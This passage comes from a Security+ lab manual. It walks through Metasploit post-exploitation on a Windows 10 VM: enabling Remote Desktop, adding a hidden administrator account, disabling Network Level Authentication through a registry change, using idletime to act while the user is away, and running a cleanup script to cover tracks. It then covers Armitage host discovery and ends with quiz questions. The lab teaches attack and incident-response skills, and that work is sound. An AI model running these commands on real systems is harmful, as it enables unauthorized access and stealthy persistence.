a.   In the Meterpreter shell, enter

info post/windows/manage/enable_rdp

to get info on the Windows Manage Enable Remote Desktop module.

b.   Run it with the following command:

run post/windows/manage/enable_rdp username=hacker password=AAAbbb111

Notice all of the background actions that are taking place, including opening a port in the local firewall if necessary, adding the user hacker (you can either do this with the mindset of a white hat hacker or a black hat hacker) with the password specified, adding the user to the Remote Desktop Users group, hiding the user from the Windows Login screen, and adding the user to the Administrators group. You’ll also notice a file path for cleaning up and covering your tracks, which will be referenced in Step 6e.

c.   Enter the following command (note that this is one command that wraps; do not press ENTER to break up this or the rest of the commands in the chapter):

reg setval -k
'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -v UserAuthentication -d '0'

This command goes to a registry key (-k) and changes a value (-v) with specific data (-d). This is necessary to bypass the setting of Require Computers to Use Network Level Authentication to Connect. There is a checkbox in Advanced Settings of Remote Desktop Settings that is checked by default; that would prevent Remote Desktop access from the Kali Linux VM. This command and registry change override that setting.

d.   Run the command

idletime

to get an idea if there is a person actively using the exploited machine currently. This information is handy for deciding whether to continue with the next steps now or possibly after some time elapses.

e.   In a new Z shell terminal, enter

rdesktop -u hacker -p AAAbbb111 192.168.1.105

but using the IP address of your Windows 10 VM instead.

If you completed Chapter 14, you’ll see the logon warning made with a GPO. If so, click the OK button.

You’ll see the username of hacker with the following message: “Another user is signed in. If you continue, they’ll be disconnected. Do you want to sign in anyway?” This is where the idletime command comes in handy. If you saw a value for idletime that indicates a user might not be in front of the machine (for example, if they haven’t touched the keyboard for around 10 minutes or so), now is a good time to try this. Click the Yes button.

On the Windows 10 VM, you’ll now see the following messages (with your machine’s name): “Do you want to allow WEISSMAN-CLIENThacker to connect to this machine?” Click OK to disconnect your session immediately or click Cancel to stay connected. No action will disconnect your session in 30 seconds. Assuming the user is not in front of their computer (based on the output from idletime), 30 seconds will elapse and the hacker account will be signed in. Now you’re not restricted by the Meterpreter shell or the Windows command prompt, and you can freely interact with the victim machine. Stealing the Windows password hashes and many more actions are now trivial to perform!

After you’ve completed your activities in the compromised machine, from Meterpreter, close the Remote Desktop window and run the following cleanup script in Meterpreter to remove the added account and cover your tracks:

run multi_console_command –r <file listed in output after you completed Step 6b>

Due to changes in the registry with Windows 10, the last operation will fail. Don’t worry about it.

In Chapter 11, you cracked Windows password hashes with Mimikatz. This step illustrates how you’d get into the system to get the hashes in the first place. Imagine the possibilities for an attacker, now, with full GUI access!

f.   From Meterpreter, either reboot or shut down the Windows 10 VM (yes, you can perform those actions from Meterpreter) with reboot or shutdown, respectively.

That’s a wrap!

10 MINUTES

Lab Exercise 22.04: Armitage

Armitage is a GUI front end for the Metasploit Framework. You’re going to use it in this lab exercise to discover host systems. The detection of a high volume of traffic, which this lab exercise will generate, is also a great indication of an incident, which could lead to incident response.

Learning Objectives

In this lab exercise, you’ll add another tool to your arsenal. At the end of this lab exercise, you’ll be able to

•   Use Armitage to discover host systems

•   Understand how this will appear as an incident on the target network

•   Be able to take the information from this lab and use it for port scanning, the logical next step

Lab Materials and Setup

The materials you need for this lab are

•   The Principles of Computer Security: CompTIA Security+ and Beyond textbook

•   The Kali Linux VM you created in Chapter 1

•   As many systems as possible on your network

Let’s Do This!

Power on as many devices on your network as possible. The more the merrier! Laptops, desktops, phones, tablets, and more should all be ready for some probing.

Step 1 Install and launch Armitage.

a.   From a terminal on the Kali Linux VM, enter

sudo apt install armitage

Enter y and press ENTER to install Armitage when prompted.

b.   Start the RDBMS, like you did earlier, with

sudo /etc/init.d/postgresql start

c.   Launch Armitage with the following command:

sudo armitage

Click the Connect button in the first dialog box that pops up, keeping all default values, and then click the Yes button in the second dialog box that pops up. The “Connection refused” message will resolve itself very quickly, so don’t worry when you see that message.

2b

Step 2 Use Armitage to discover hosts on a network.

a.   The lower pane, using tabs, shows the commands you would enter into the console if you weren’t using this GUI, along with the corresponding output. If you want, you can type directly into that pane at the msf6 > prompt.

b.   In the Armitage interface, in the top menu, select Hosts | Nmap Scan | Quick Scan (OS Detect) to discover all hosts on your subnet. You’ll need to provide your network ID and subnet mask, which in most cases will be 192.168.1.0/24, as shown in the dialog box. Only scan networks under your control that you’re authorized to scan, as discussed in Chapter 16.

Click the OK button after you enter the information.

When the scan is complete, a list of all discovered devices, including IP addresses, port information, and in some cases operating systems, will appear in the upper-right pane. Tons of valuable information will appear in the lower pane, as shown in Figure 22-2.

FIGURE 22-2 Armitage discovers many systems in the Weissman household.

The next logical step would be some port scanning, with different types of scans, as covered in Chapter 16.

Lab Analysis

1.   What is an incident?

2.   What is incident response?

3.   Why were the Metasploit Framework lab exercises important for understanding incident response?

Key Term Quiz

Use the terms from the list to complete the sentences that follow.

exploit

front end

payload

shell

vulnerability

1.   SMB is a(n) ____________.

2.   EternalBlue is a(n) ____________.

3.   windows/meterpreter/reverse_tcp is a(n) ____________.

4.   Before running native Windows commands on a compromised Windows system, the ____________ command must be run.

5.   Armitage is a(n) ____________ for the Metasploit Framework.